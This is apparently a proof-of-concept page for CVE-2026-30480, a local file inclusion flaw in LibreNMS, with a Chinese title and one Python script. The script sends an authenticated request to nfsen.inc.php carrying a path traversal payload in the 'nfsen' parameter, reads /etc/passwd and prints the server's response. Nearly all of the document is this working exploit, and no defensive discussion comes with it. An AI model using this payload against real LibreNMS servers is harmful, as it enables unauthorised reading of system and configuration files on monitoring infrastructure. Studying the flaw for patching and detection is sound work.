CVE-2026-30480 LibreNMS本地文件包含漏洞

import requests # Target configuration target_url = "http://target-ip/librenms/html/pages/nfsen.inc.php" # Attacker needs valid session cookie (Authentication required: PR:L) session_cookie = "PHPSESSID=attacker_valid_session_id_here" # Headers headers = { "Cookie": session_cookie, "User-Agent": "CVE-2026-30480-Scanner/1.0" } # Payload exploiting path traversal in 'nfsen' parameter # Attempting to include a sensitive file (e.g., /etc/passwd or a config file) # Note: The vulnerability description specifies including PHP files, # but LFI often allows reading other file types depending on PHP config. payload_params = { "nfsen": "../../../../../../../../etc/passwd" } try: response = requests.get(target_url, params=payload_params, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response Content (Snippet):") print(response.text[:500]) # Print first 500 chars to verify inclusion else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}")